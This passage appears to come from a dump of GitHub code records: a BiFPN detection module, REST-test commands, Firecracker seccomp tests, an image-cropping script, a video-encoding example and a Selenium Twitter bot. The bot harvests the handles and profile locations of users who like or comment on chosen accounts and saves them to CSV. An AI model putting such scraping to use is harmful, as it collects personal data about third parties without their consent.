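# as in Fusion.forward with weight_method="fastattn".
w = torch.relu(torch.ones(2))                    # edge weights after ReLU
x = [torch.rand(1, 8, 4, 4) for _ in range(2)]
fused = (w[0] * x[0] + w[1] * x[1]) / (w.sum() + 1e-4)
print(fused.shape)  # torch.Size([1, 8, 4, 4])
```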
fpn_config = edict()\n fpn_config.out_channels = out_channels\n fpn_config.level = 5\n # define connection method\n fpn_config.nodes = [\n {\"inputs_offsets\": [3, 4], \"sampling\": [\"keep\", \"up\"]},\n {\"inputs_offsets\": [2, 5], \"sampling\": [\"keep\", \"up\"]},\n {\"inputs_offsets\": [1, 6], \"sampling\": [\"keep\", \"up\"]},\n {\"inputs_offsets\": [0, 7], \"sampling\": [\"keep\", \"up\"]},\n {\"inputs_offsets\": [1, 7, 8], \"sampling\": [\"keep\", \"keep\", \"down\"]},\n {\"inputs_offsets\": [2, 6, 9], \"sampling\": [\"keep\", \"keep\", \"down\"]},\n {\"inputs_offsets\": [3, 5, 10], \"sampling\": [\"keep\", \"keep\", \"down\"]},\n {\"inputs_offsets\": [4, 11], \"sampling\": [\"keep\", \"down\"]},\n ]\n # define weighting method\n fpn_config.weight_method = \"sum\"\n if fpn_name == \"bifpn_fa\":\n fpn_config.weight_method = \"fastattn\"\n\n return fpn_config\n\n\n@OBJECT_REGISTRY.register\nclass BiFPN(nn.Module):\n \"\"\"Weighted Bi-directional Feature Pyramid Network(BiFPN).\n\n This is an implementation of - EfficientDet: Scalable and Efficient Object\n Detection (https://arxiv.org/abs/1911.09070)\n\n Args:\n in_strides (list[int]): Stride of input feature map\n out_strides (int): Stride of output feature map\n stride2channels (dict): The key:value is stride:channel ,\n the channles have been multipified by alpha\n out_channels (int|dict): Channel number of output layer, the key:value\n is stride:channel.\n num_outs (int): Number of BifpnLayer's input, the value is must 5,\n because the bifpn layer is fixed\n stack (int): Number of BifpnLayer\n start_level (int): Index of the start input backbone level\n used to build the feature pyramid. Default: 0.\n end_level (int): Index of the end input backbone level (exclusive)\n to build the feature pyramid. 
Default: -1, means the last level.\n fpn_name (str): the value is mutst between with 'bifpn_sum', 'bifpn_fa'\n\n \"\"\"\n\n def __init__(\n self,\n in_strides,\n out_strides,\n stride2channels,\n out_channels,\n num_outs,\n stack=3,\n start_level=0,\n end_level=-1,\n fpn_name=\"bifpn_sum\",\n ):\n super(BiFPN, self).__init__()\n\n self.in_strides = in_strides\n self.out_strides = out_strides\n self.stride2channels = stride2channels\n self.in_channels = [stride2channels[stride] for stride in in_strides]\n assert isinstance(out_channels, int) or isinstance(out_channels, dict)\n self.out_channels = (\n [out_channels[stride] for stride in out_strides]\n if isinstance(out_channels, dict)\n else [out_channels for _ in out_strides]\n )\n self.num_ins = len(in_strides)\n self.num_outs = num_outs\n\n # assert in_strides in stride2channels\n self.in_strides = _check_strides(\n in_strides, self.stride2channels.keys()\n )\n\n assert len(self.out_strides) <= num_outs\n assert stack >= 1\n self.stack = stack\n self.fpn_config = get_fpn_config(fpn_name, self.out_channels)\n\n if end_level == -1:\n self.backbone_end_level = self.num_ins\n assert self.num_outs >= self.num_ins - start_level\n else:\n # if end_level < inputs, no extra level is allowed\n self.backbone_end_level = end_level\n assert end_level <= len(self.in_channels)\n assert self.num_outs == end_level - start_level\n\n self.start_level = start_level\n self.end_level = end_level\n # add extra downsample layers (stride-2 pooling or conv + pooling)\n # to build extra input features that are not from backbone.\n extra_levels = (\n self.num_outs - self.backbone_end_level + self.start_level\n )\n # channels for multi-level feature-map used in bifpn\n self.fpn_config.in_channels = self.in_channels[\n self.start_level : self.backbone_end_level\n ] + [\n self.out_channels[self.backbone_end_level - self.start_level + i]\n for i in range(extra_levels)\n ]\n # bifpn total out strides and out_index\n self.total_out_strides = self.in_strides[\n self.start_level : self.backbone_end_level\n ] + [\n self.in_strides[self.backbone_end_level - 1] * (2 ** (i + 1))\n for i in range(extra_levels)\n ]\n self.out_index = [\n self.total_out_strides.index(stride) for stride in self.out_strides\n ]\n # build extra_downsample layers\n self.extra_downsamples = ModuleList()\n for i in range(extra_levels):\n out_channels = self.out_channels[\n self.backbone_end_level - self.start_level + i\n ]\n downsample = Resize(\n sampling=\"down\",\n in_channels=self.in_channels[-1],\n out_channels=out_channels,\n pooling_type=\"max\",\n use_bn=True,\n conv_after_downsample=False,\n )\n self.in_channels[-1] = out_channels\n self.extra_downsamples.append(downsample)\n # repeat build bifpn layer many times\n self.bifpn_layers = ModuleList()\n for i in range(self.stack):\n rank_zero_info(\"building bifpn cell %d\" % (i))\n if i == self.stack - 1:\n out_index = self.out_index\n else:\n out_index = None\n bifpn_layer = BifpnLayer(edict(self.fpn_config.copy()), out_index)\n self.bifpn_layers.append(bifpn_layer)\n # update fpn_in_channels, only need to update once\n if i == 0:\n self.fpn_config.in_channels = [\n self.out_channels[i] for i in range(self.num_outs)\n ]\n self._init_weights()\n\n def _init_weights(self):\n \"\"\"Initialize the weights of BiFPN module.\"\"\"\n for m in self.modules():\n if isinstance(m, nn.Conv2d):\n normal_init(m, mean=0, std=0.01, bias=0)\n\n def forward(self, inputs):\n \"\"\"Forward features.\n\n Args:\n inputs (list[tensor]): Input tensors\n\n Returns 
(list[tensor]): Output tensors\n\n \"\"\"\n assert len(inputs) == len(self.in_channels)\n x = list(inputs[self.start_level : self.backbone_end_level])\n # build extra input features\n for downsample in self.extra_downsamples:\n x.append(downsample(x[-1]))\n # repeat bifpn\n for i in range(self.stack):\n x = self.bifpn_layers[i](x)\n return x\n\n def fuse_model(self):\n try:\n from changan_plugin_pytorch import quantization\n\n fuser_func = quantization.fuse_known_modules\n except ImportError:\n logging.warning(\n \"Please install changan_plugin_pytorch first, otherwise use \"\n \"pytorch official quantification\"\n )\n from torch.quantization.fuse_modules import fuse_known_modules\n\n fuser_func = fuse_known_modules\n\n total_fuse = 0\n for m in self.modules():\n if type(m) == MaybeApply1x1:\n if hasattr(m, \"lateral_conv\"):\n torch.quantization.fuse_modules(\n m,\n [\"lateral_conv.0\", \"lateral_conv.1\"],\n inplace=True,\n fuser_func=fuser_func,\n )\n total_fuse += 1\n elif type(m) == ConvModule2d:\n m.fuse_model()\n total_fuse += 1\n rank_zero_info(\"neck total_fuse {}\".format(total_fuse))\n\n def set_qconfig(self):\n from cap.utils import qconfig_manager\n\n self.qconfig = qconfig_manager.get_default_qat_qconfig()\n","repo_name":"xingyun-xy/cap","sub_path":"cap/models/necks/bifpn.py","file_name":"bifpn.py","file_ext":"py","file_size_in_byte":17639,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"554695524","text":"from ftw.upgrade import UpgradeStep\nimport pkg_resources\n\n\nclass RemoveCssbundle(UpgradeStep):\n \"\"\"Remove cssbundle.\n \"\"\"\n\n def __call__(self):\n IS_PLONE_5 = pkg_resources.get_distribution('Products.CMFPlone').version >= '5'\n if IS_PLONE_5:\n self.install_upgrade_profile()\n","repo_name":"4teamwork/ftw.colorbox","sub_path":"ftw/colorbox/upgrades/20200508162012_remove_cssbundle/upgrade.py","file_name":"upgrade.py","file_ext":"py","file_size_in_byte":307,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"74267195686","text":"from requests.status_codes import _codes\nfrom requests.structures import CaseInsensitiveDict\nfrom .command import Command\nfrom .command_factory import CommandFactory\nfrom .command_register import CommandRegister\nfrom .indor_exceptions import SyntaxErrorWrongNumberOfArguments, InvalidRelationalOperator\nfrom .parsed_value import ParsedValue\nfrom .parsing_exception import ParsingException\nfrom .relational_operators import compare_by_supposed_relational_operator\nfrom .result import Error, Passed, Failed\nfrom . import result\n\n\nclass CommandResponseRedirects(Command, metaclass=CommandRegister):\n pretty_name = \"ASSERT RESPONSE REDIRECTS\"\n\n def __init__(self, result_collector):\n super(CommandResponseRedirects, self).__init__(result_collector)\n\n def parse(self, path):\n next_step = CommandFactory().get_class(self.__class__.__name__, path[0], self.result_collector)\n return next_step.parse(path[1:])\n\n\nclass CommandResponseRedirectsCount(Command, metaclass=CommandRegister):\n pretty_name = \"RESPONSE REDIRECTS COUNT\"\n\n def __init__(self, result_collector):\n super(CommandResponseRedirectsCount, self).__init__(result_collector)\n\n def parse(self, path):\n if len(path) != 2 and len(path) != 0:\n raise SyntaxErrorWrongNumberOfArguments(self.__class__.__name__,\n 'Two or zero arguments expected: relational operator and number. 
Example: < 2')\n\n response = self.result_collector.get_response()\n if response is None:\n raise ParsingException(self, result.ERROR_RESPONSE_NOT_FOUND)\n\n try:\n actual = len(response.history)\n\n if len(path) == 0:\n actual, ParsedValue(self, None, \"\")\n\n relational_operator = path[0]\n expected = int(path[1])\n\n parsed = ParsedValue(self, True, relational_operator + \" \" + path[1])\n computed = compare_by_supposed_relational_operator(actual, relational_operator, expected)\n return computed, parsed\n except ValueError:\n raise ParsingException(self, result.ERROR_NUMBER_EXPECTED)\n except InvalidRelationalOperator as e:\n raise ParsingException(self, Error.from_exception(self, e))\n\n\nclass CommandResponse(Command, metaclass=CommandRegister):\n pretty_name = \"ASSERT RESPONSE\"\n\n def __init__(self, result_collector):\n super(CommandResponse, self).__init__(result_collector)\n\n def parse(self, path):\n if len(path) == 0:\n raise SyntaxErrorWrongNumberOfArguments(self.__class__.__name__,\n hints=CommandFactory().get_class_children(\n self.__class__.__name__))\n\n next_step = CommandFactory().get_class(self.__class__.__name__, path[0], self.result_collector)\n return next_step.parse(path[1:])\n\n\nclass CommandResponseNot(Command, metaclass=CommandRegister):\n pretty_name = \"ASSERT RESPONSE NOT\"\n\n def __init__(self, result_collector):\n super(CommandResponseNot, self).__init__(result_collector)\n\n def parse(self, path):\n if len(path) == 0:\n raise SyntaxErrorWrongNumberOfArguments(self.__class__.__name__,\n hints=CommandFactory().get_class_children(\n self.__class__.__name__))\n\n next_step = CommandFactory().get_class(self.__class__.__name__, path[0], self.result_collector)\n return next_step.parse(path[1:])\n\n\nclass CommandResponseStatus(Command, metaclass=CommandRegister):\n pretty_name = \"RESPONSE STATUS\"\n\n def __init__(self, result_collector):\n super(CommandResponseStatus, self).__init__(result_collector)\n self.mapping = CaseInsensitiveDict()\n self.mapping[\"Ok\"] = 200\n self.mapping[\"Not found\"] = 404\n\n def map_status_code(self, status):\n \"\"\"\n\n author Damian Mirecki\n\n :param status\n :return:\n :rtype: int\n :raise LookupError: When status is not implemented yet.\n \"\"\"\n\n if status not in self.mapping:\n raise LookupError(\"Status \" + status + \" not found in \" + self.mapping.__str__())\n\n return self.mapping[status]\n\n def parse(self, path):\n response = self.result_collector.get_response()\n if response is None:\n raise ParsingException(self, result.ERROR_RESPONSE_NOT_FOUND)\n\n actual = response.status_code\n\n if len(path) == 0:\n return actual, ParsedValue(self, None, \"\")\n\n status = path[0]\n\n if not status.isdigit():\n try:\n status = self.map_status_code(status)\n except LookupError as e:\n raise ParsingException(self, Error.from_exception(self, e))\n else:\n if int(status) not in _codes.keys():\n raise ParsingException(self, result.ERROR_INVALID_STATUS_CODE)\n\n expected = int(status)\n return actual, ParsedValue(self, expected, \"\")\n\n\nclass CommandResponseType(Command, metaclass=CommandRegister):\n pretty_name = \"ASSERT RESPONSE TYPE\"\n\n def __init__(self, result_collector):\n super(CommandResponseType, self).__init__(result_collector)\n\n def parse(self, path):\n if len(path) == 0:\n raise SyntaxErrorWrongNumberOfArguments(self.__class__.__name__,\n hints=CommandFactory().get_class_children(\n self.__class__.__name__))\n\n next_step = CommandFactory().get_class(self.__class__.__name__, path[0], 
self.result_collector)\n return next_step.parse(path[1:])\n\n\nclass CommandResponseTypeJson(Command, metaclass=CommandRegister):\n pretty_name = \"RESPONSE CONTENT TYPE IS JSON\"\n\n def __init__(self, result_collector):\n super(CommandResponseTypeJson, self).__init__(result_collector)\n\n def parse(self, path):\n response = self.result_collector.get_response()\n if response is None:\n raise ParsingException(self, result.ERROR_RESPONSE_NOT_FOUND)\n\n try:\n response.json()\n except ValueError:\n return False, ParsedValue(self, True, \"not json\")\n else:\n return True, ParsedValue(self, True, \"not json\")\n\n\nclass CommandResponseLength(Command, metaclass=CommandRegister):\n pretty_name = \"ASSERT RESPONSE LENGTH\"\n\n def __init__(self, result_collector):\n super(CommandResponseLength, self).__init__(result_collector)\n\n def parse(self, path):\n if len(path) != 2 and len(path) != 0:\n raise SyntaxErrorWrongNumberOfArguments(self.__class__.__name__,\n 'Two or zero arguments expected: relational operator and number. Example: < 2')\n\n response = self.result_collector.get_response()\n if response is None:\n raise ParsingException(self, result.ERROR_RESPONSE_NOT_FOUND)\n\n try:\n content_length = len(response.content)\n\n if len(path) == 0:\n return content_length, ParsedValue(self, None, \"\")\n\n relational_operator = path[0]\n expected = int(path[1])\n\n parsed = ParsedValue(self, True, relational_operator + \" \" + path[1])\n computed = compare_by_supposed_relational_operator(content_length, relational_operator, expected)\n return computed, parsed\n except ValueError:\n raise ParsingException(self, result.ERROR_NUMBER_EXPECTED)\n except InvalidRelationalOperator as e:\n raise ParsingException(self, Error.from_exception(self, e))\n\n\nclass CommandResponseEmpty(Command, metaclass=CommandRegister):\n __metaclass__ = CommandRegister\n\n pretty_name = \"RESPONSE EMPTY\"\n\n def __init__(self, result_collector):\n super(CommandResponseEmpty, self).__init__(result_collector)\n\n def parse(self, path):\n response = self.result_collector.get_response()\n if response is None:\n raise ParsingException(self, result.ERROR_RESPONSE_NOT_FOUND)\n\n computed = len(response.content) == 0\n parsed = ParsedValue(self, True, \"EMPTY\")\n return computed, parsed\n\n\nclass CommandResponseNotEmpty(Command, metaclass=CommandRegister):\n pretty_name = \"RESPONSE NOT EMPTY\"\n\n def __init__(self, result_collector):\n super(CommandResponseNotEmpty, self).__init__(result_collector)\n\n def parse(self, args):\n response = self.result_collector.get_response()\n if response is None:\n raise ParsingException(self, result.ERROR_RESPONSE_NOT_FOUND)\n\n computed = len(response.content) != 0\n parsed = ParsedValue(self, True, \"NOT EMPTY\")\n return computed, parsed\n\n\nclass CommandResponseTime(Command, metaclass=CommandRegister):\n pretty_name = \"ASSERT RESPONSE TIME\"\n\n missed_arguments = 'At least two arguments expected: relational operator and number. 
Example: < 2'\n\n def __init__(self, result_collector):\n super(CommandResponseTime, self).__init__(result_collector)\n\n def parse(self, path):\n response = self.result_collector.get_response()\n if response is None:\n raise ParsingException(self, result.ERROR_RESPONSE_NOT_FOUND)\n\n response_time = response.elapsed.total_seconds() * 1000\n\n if len(path) < 2:\n return response_time, ParsedValue(self, None, \"\")\n\n try:\n relational_operator = path[0]\n expected = int(path[1])\n parsed = ParsedValue(self, True, relational_operator + \" \" + path[1])\n computed = compare_by_supposed_relational_operator(response_time, relational_operator, expected)\n return computed, parsed\n except ValueError:\n raise ParsingException(self, result.ERROR_NUMBER_EXPECTED)\n except InvalidRelationalOperator as e:\n raise ParsingException(self, Error.from_exception(self, e))","repo_name":"nokia-wroclaw/innovativeproject-resttest","sub_path":"src/indor/command_response.py","file_name":"command_response.py","file_ext":"py","file_size_in_byte":10107,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"28089812599","text":"from selenium import webdriver\nfrom selenium import common\nfrom selenium.webdriver.common import keys\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.support.ui import WebDriverWait\nfrom selenium.webdriver.support import expected_conditions as EC\nimport time\nimport datetime\nfrom utils import *\nimport numpy as np\nfrom TwitterUser import *\n\n\n\n\n# https://zhuanlan.zhihu.com/p/60852696\noption = webdriver.ChromeOptions()\noption.add_argument('--disable-gpu')\noption.add_argument('--start-maximized')\noption.add_argument('blink-settings=imagesEnabled=false')\nprefs = {\n 'profile.default_content_setting_values' : {\n 'notifications' : 2\n }\n}\n# 保持页面登录状态\noption.add_argument(r'user-data-dir=C:\\Users\\LY\\AppData\\Local\\Google\\Chrome\\User Data')\noption.add_experimental_option('prefs', prefs)\ndriver = webdriver.Chrome(chrome_options=option)\ndriver.implicitly_wait(30)\ndriver.maximize_window()\nclass TwitterBot:\n\n \"\"\"\n A Bot class that provide features of:\n - Logging into your Twitter account\n - Liking tweets of your homepage\n - Searching for some keyword or hashtag\n - Liking tweets of the search results\n - Posting tweets\n - Logging out of your account\n\n ........\n\n Attributes\n ----------\n email : str\n user email for Twitter account\n password : str\n user password for Twitter account\n bot : WebDriver\n webdriver that carry out the automation tasks\n is_logged_in : bool\n boolean to check if the user is logged in or not\n\n Methods\n -------\n login()\n logs user in based on email and password provided during initialisation\n logout()\n logs user out\n search(query: str)\n searches for the provided query string\n like_tweets(cycles: int)\n loops over number of cycles provided, scrolls the page down and likes the available tweets on the page in each loop pass\n \"\"\"\n \n\n def __init__(self, email, password, userName, maxScrollDownTimes, outputTweetsPath, urlPrefix, translateTargetLanguage):\n self.email = email\n self.password = password\n self.userName = userName\n self.bot = driver\n self.outputTweetsPath = outputTweetsPath\n self.maxScrollDownTimes = maxScrollDownTimes\n self.urlPrefix = urlPrefix\n self.translateTargetLanguage = translateTargetLanguage\n self.is_logged_in = False\n\n\n def loginNormal(self):\n bot = self.bot\n bot.get('https://twitter.com/i/flow/login')\n\n 
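# NOTE: the element lookups below (NAME 'text'/'password' and the long layers XPATH)\n        # follow Twitter's login DOM at the time of writing; these selectors are\n        # assumptions that may need updating whenever the page markup changes.\n        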
emailInput = bot.find_element(By.NAME, r'text')\n emailInput.clear()\n emailInput.send_keys(self.email)\n\n time.sleep(2)\n\n nextStepButton = bot.find_element(By.XPATH, r'//*[@id=\"layers\"]/div/div/div/div/div/div/div[2]/div[2]/div/div/div[2]/div[2]/div/div/div/div[6]/div')\n nextStepButton.click()\n\n passwdInput = bot.find_element(By.NAME, r'password')\n passwdInput.clear()\n passwdInput.send_keys(self.password)\n\n loginButton = bot.find_element(By.XPATH, r'//*[@id=\"layers\"]/div/div/div/div/div/div/div[2]/div[2]/div/div/div[2]/div[2]/div[2]/div/div[1]/div/div/div/div')\n loginButton.click()\n\n self.is_logged_in = True\n def loginAbnormal(self):\n bot = self.bot\n bot.get('https://twitter.com/i/flow/login')\n\n emailInput = bot.find_element(By.NAME, r'text')\n emailInput.clear()\n emailInput.send_keys(self.email)\n time.sleep(2)\n nextStepButton = bot.find_element(By.XPATH, r'//*[@id=\"layers\"]/div/div/div/div/div/div/div[2]/div[2]/div/div/div[2]/div[2]/div/div/div/div[6]/div')\n nextStepButton.click()\n\n userIdInput = bot.find_element(By.NAME, 'text')\n userIdInput.clear()\n userIdInput.send_keys(self.userName)\n userIdInput.send_keys(keys.Keys.ENTER)\n time.sleep(2)\n\n passwdInput = bot.find_element(By.NAME, r'password')\n passwdInput.clear()\n passwdInput.send_keys(self.password)\n passwdInput.send_keys(keys.Keys.ENTER)\n\n self.is_logged_in = True\n\n def logout(self):\n if not self.is_logged_in:\n return \n\n bot = self.bot\n bot.get('https://twitter.com/home')\n time.sleep(4)\n\n try:\n bot.find_element_by_xpath(\"//div[@data-testid='SideNav_AccountSwitcher_Button']\").click()\n except common.exceptions.NoSuchElementException:\n time.sleep(3)\n bot.find_element_by_xpath(\"//div[@data-testid='SideNav_AccountSwitcher_Button']\").click()\n\n time.sleep(1)\n\n try:\n bot.find_element_by_xpath(\"//a[@data-testid='AccountSwitcher_Logout_Button']\").click()\n except common.exceptions.NoSuchElementException:\n time.sleep(2)\n bot.find_element_by_xpath(\"//a[@data-testid='AccountSwitcher_Logout_Button']\").click()\n\n time.sleep(3)\n\n try:\n bot.find_element_by_xpath(\"//div[@data-testid='confirmationSheetConfirm']\").click()\n except common.exceptions.NoSuchElementException:\n time.sleep(3)\n bot.find_element_by_xpath(\"//div[@data-testid='confirmationSheetConfirm']\").click()\n\n time.sleep(3) \n self.is_logged_in = False\n\n\n # usersList为[realcaixia, JoeBiden]\n # 返回[Tweets]\n def getAndWriteUserTweets(self, usersList, outputTweetsPath):\n bot = self.bot\n TweetsList = []\n for user in usersList:\n userPage = self.urlPrefix + user\n bot.get(userPage)\n time.sleep(3)\n scrollDown(bot)\n thisUserTweetsList = getUserTweets(bot, user)\n print(len(thisUserTweetsList))\n writeTweetsToCSV(thisUserTweetsList, outputTweetsPath)\n print('----------------------正在写入----------------------')\n TweetsList.append(thisUserTweetsList)\n print('全部一级用户Tweets已写入外部文件')\n return TweetsList\n\n # 输入usersList为一级用户List\n # 二级用户即给一级用户点赞评论的用户\n def getSecondLevelUsers(self, usersList):\n bot = self.bot\n SecondLevelUsers = []\n for user in usersList:\n # 进入当前用户主页\n userPage = self.urlPrefix + user\n bot.get(userPage)\n scrollDown(bot)\n time.sleep(3)\n\n articlesLink, articlesLikesLink = getUserTweetsAndLikesLink(bot)\n for articlesLink, articlesLike in zip(articlesLink, articlesLikesLink):\n # 获取评论用户\n bot.get(articlesLink)\n scrollDown(bot)\n time.sleep(3)\n commentUsers = getCommentUsers(bot, user)\n\n # 获取点赞用户\n bot.get(articlesLike)\n scrollDown(bot)\n time.sleep(3)\n\n likeUsers = getLikeUser(bot, 
user)\n SecondLevelUsers.extend([item for item in likeUsers])\n SecondLevelUsers.extend([item for item in commentUsers])\n # 去重\n return list(set(SecondLevelUsers))\n \n # # 从articlesLink中检索评论用户\n\n\n\n # https://twitter.com/JoeBiden 后边为用户id\n # 获取给用户userId近期推文点赞的用户id,返回list\n def searchLikesUsers(self, userId='', outputPath=''):\n bot = self.bot\n personPage = 'https://twitter.com/' + userId\n bot.get(personPage)\n\n\n time.sleep(5)\n articleList = bot.find_elements(By.XPATH, r'//a[@class=\"css-4rbku5 css-18t94o4 css-901oao r-14j79pv r-1loqt21 r-xoduu5 r-1q142lx r-1w6e6rj r-37j5jr r-a023e6 r-16dba41 r-9aw3ui r-rjixqe r-bcqeeo r-3s2u2q r-qvutc0\"]')\n urls_before = articleList\n # urls_before = articleList.find_elements(By.XPATH, r'//a')\n urls_after = []\n # # 推文链接为https://twitter.com/realcaixia/status/1401129211138658308\n # containKeys = userId + '/' + 'status'\n # notcontainKeys = 'photo'\n for url in urls_before:\n urlArray = url.get_attribute('href')\n urls_after.append(urlArray)\n print(urls_after)\n\n\n allUsers = []\n for url in urls_after:\n urlLikes = url + '/' + 'likes'\n bot.get(urlLikes)\n time.sleep(5)\n userSpans = bot.find_elements(By.XPATH, r\"//span[@class='css-901oao css-16my406 r-poiln3 r-bcqeeo r-qvutc0']\")\n for span in userSpans:\n thisSpanUser = span.get_attribute('innerHTML')\n if thisSpanUser.startswith('@') and thisSpanUser != ('@'+ self.userName):\n allUsers.append(thisSpanUser)\n print('本次获取到的点赞用户数量为:')\n print(len(list(set(allUsers))))\n write_csv(outputPath, list(set(allUsers)))\n print('以将用户列表保存到本地指定路径!!!')\n return list(set(allUsers))\n \n # normal\n # urlTest = urls_after[0]\n # urlTest = 'https://twitter.com/realcaixia/status/1401129211138658308'\n # urlLike = urlTest + '/' + 'likes'\n # bot.get(urlLike)\n # time.sleep(5)\n\n # userIdList中的userId均以@开头\n # https://twitter.com/userId为该用户主页\n def searchForLikesUsersTweetsAndLocation(self, userIdsPath):\n bot = self.bot\n\n # 从本地文件读取userIdsList\n userIdsList = read_csv(userIdsPath)\n print(userIdsList)\n userIdsList = ['realcaixia', 'JoeBiden']\n\n userId = 'realcaixia'\n userPage = 'https://twitter.com' + '/' + userId\n bot.get(userPage)\n time.sleep(5)\n try:\n userLocationSpan = bot.find_element(By.XPATH, r'/html/body/div[1]/div/div/div[2]/main/div/div/div/div[1]/div/div[3]/div/div/div/div/div[4]/div/span[1]/span/span')\n userLocation = userLocationSpan.get_attribute('innerHTML')\n except:\n userLocation = 'Not Found'\n\n print(userLocation)\n\n # userInformationDiv = bot.find_element(By.XPATH, r'/html/body/div[1]/div/div/div[2]/main/div/div/div/div[1]/div/div[3]/div/div/div/div/div[3]/div/div[1]')\n # userInformationSpan = userInformationDiv.find_elements(By.TAG_NAME, r'span')\n # userInformation = ''\n # for span in userInformationSpan:\n # infor = span.get_attribute('innerHTML')\n # if infor.startswith('= 1\n\n # assert that the process was killed\n assert not psutil.pid_exists(test_microvm.firecracker_pid)\n\n\n@pytest.mark.parametrize(\"vm_config_file\", [\"framework/vm_config.json\"])\ndef test_invalid_bpf(test_microvm_with_api, vm_config_file):\n \"\"\"\n Test that FC does not start, given an invalid binary filter.\n \"\"\"\n test_microvm = test_microvm_with_api\n\n # Configure VM from JSON. 
Otherwise, the test will error because\n # the process will be killed before configuring the API socket.\n _config_file_setup(test_microvm_with_api, vm_config_file)\n\n bpf_path = os.path.join(test_microvm.path, \"bpf.out\")\n file = open(bpf_path, \"w\", encoding=\"utf-8\")\n file.write(\"Invalid BPF!\")\n file.close()\n\n test_microvm.create_jailed_resource(bpf_path)\n test_microvm.jailer.extra_args.update({\"seccomp-filter\": \"bpf.out\"})\n\n test_microvm.spawn()\n\n # give time for the process to get killed\n time.sleep(1)\n\n # assert that the process was killed\n assert not psutil.pid_exists(test_microvm.firecracker_pid)\n","repo_name":"firecracker-microvm/firecracker","sub_path":"tests/integration_tests/security/test_custom_seccomp.py","file_name":"test_custom_seccomp.py","file_ext":"py","file_size_in_byte":6134,"program_lang":"python","lang":"en","doc_type":"code","stars":22949,"dataset":"github-code","pt":"53"} +{"seq_id":"20908588533","text":"import cv2\nimport numpy as np\nimport os\nfrom math import ceil\n\n# param\n# aligned_img_gray is a grayscale 2D numpy image array\n# -- will be the output of preproc_align_image() \n# page_number is 1,2,3, or 4\n# return\n# return True\n# will create a new directory containing appropariately named 3D PNG/JPG images -\n# - of all the individual cropped ROIs\ndef preproc_roi_output(aligned_img_gray, page_number):\n\n # EDIT AS NECESSARY\n curr_path = os.getcwd() #curr_path is the same folder where the original picture is\n new_path = os.path.join(curr_path, 'ROI_crops')\n try:\n os.mkdir(new_path)\n print(\"Created directory\", new_path)\n except:\n print(\"Warning:\", new_path, \"directory already exists, overwriting files...\")\n #cv2.imwrite(\"ROI_crops/homography_out.png\",cv2.cvtColor(aligned_img_gray,cv2.COLOR_GRAY2BGR))\n\n img = aligned_img_gray\n\n \"\"\"\n img_copy = aligned_img_gray.copy()\n img_copy = cv2.cvtColor(img_copy,cv2.COLOR_GRAY2RGB)\n counter = 0\n bgr_colors = ((255,0,0,),(0,255,0),(0,0,255))\n \"\"\"\n\n dimension = img.shape\n\n height = dimension[0]\n width = dimension[1]\n \n f = open(\"../\" + \"ROI_list_page\" + str(page_number) + \".txt\", \"r\")\n content = f.readlines()\n\n for line in content:\n data = line.split()\n topleft_x = ceil(width * float(data[1]))\n topleft_y = ceil(height * float(data[2]))\n bottomright_x = ceil(width * float(data[3]))\n bottomright_y = ceil(height * float(data[4]))\n\n #print(data[0], topleft_x,topleft_y,bottomright_x,bottomright_y)\n \"\"\"\n new_corners = np.array([[\n [topleft_x, topleft_y],\n [bottomright_x, topleft_y],\n [bottomright_x, bottomright_y],\n [topleft_x, bottomright_y]\n ]])\n \n if(not counter%3):\n cv2.drawContours(img_copy, new_corners, -1, bgr_colors[counter%3], 3)\n counter += 1\n \"\"\"\n crop_img = img[topleft_y:bottomright_y, topleft_x:bottomright_x]\n cv2.imwrite(\"ROI_crops/\"+data[0]+\".png\", crop_img)\n\n #cv2.imwrite(\"garp1_some_ROI.jpg\",img_copy)\n print(\"ROI Cropping Complete\")\n return True\n\nif __name__ == \"__main__\":\n\n dir_of_data = 'samples'\n file_used = 'garp1_new.jpg' #page3\n page_number = 1\n \n curr_dir = os.getcwd()\n os.chdir(os.path.join(curr_dir, dir_of_data))\n #print(os.getcwd())\n \n aligned_img_color = cv2.imread(file_used,cv2.IMREAD_COLOR)\n aligned_img_gray = cv2.imread(file_used,cv2.IMREAD_GRAYSCALE)\n\n #cv2.imshow(file_used + \" - \" + str(page_number),aligned_img_gray)\n\n preproc_roi_output(aligned_img_gray, 
page_number)\n","repo_name":"josei1354/ECE-COE-199","sub_path":"src/preproc/roi_cropping.py","file_name":"roi_cropping.py","file_ext":"py","file_size_in_byte":2679,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"17763085453","text":"#!/usr/bin/env python\nfrom time import sleep\n\nimport bitcodin\n\nbitcodin.api_key = 'YOUR API KEY'\n\ninput_obj = bitcodin.Input(url='http://bitbucketireland.s3.amazonaws.com/Sintel-original-short.mkv')\ninput_result = bitcodin.create_input(input_obj)\n\nvideo_configs = list()\n\nvideo_configs.append(bitcodin.VideoStreamConfig(\n default_stream_id=0,\n bitrate=4800000,\n profile='Main',\n preset='premium',\n height=1080,\n width=1920\n))\nvideo_configs.append(bitcodin.VideoStreamConfig(\n default_stream_id=0,\n bitrate=2400000,\n profile='Main',\n preset='premium',\n height=768,\n width=1024\n))\nvideo_configs.append(bitcodin.VideoStreamConfig(\n default_stream_id=0,\n bitrate=1200000,\n profile='Main',\n preset='premium',\n height=480,\n width=854\n))\n\naudio_configs = [bitcodin.AudioStreamConfig(default_stream_id=0, bitrate=192000)]\n\nencoding_profile_obj = bitcodin.EncodingProfile('API Test Profile', video_configs, audio_configs)\nencoding_profile_result = bitcodin.create_encoding_profile(encoding_profile_obj)\n\nmanifests = ['mpd', 'm3u8']\n\njob = bitcodin.Job(\n input_id=input_result.input_id,\n encoding_profile_id=encoding_profile_result.encoding_profile_id,\n manifest_types=manifests\n)\njob_result = bitcodin.create_job(job)\nprint(\"Started Job with id %d\\n\" % job_result.job_id)\n\nwhile job_result.status != 'Finished' and job_result.status != 'Error':\n job_result = bitcodin.get_job(job_result.job_id)\n print(job_result.to_json())\n sleep(5)\n\n\nsubtitles = list()\nsub_de = bitcodin.VttSubTitle('de', 'Deutsch', 'http://your.url/to/de_sub.vtt')\nsub_eng = bitcodin.VttSubTitle('eng', 'English', 'http://your.url/to/eng_sub.vtt')\nsubtitles.append(sub_de)\nsubtitles.append(sub_eng)\n\nvtt_mpd_request = 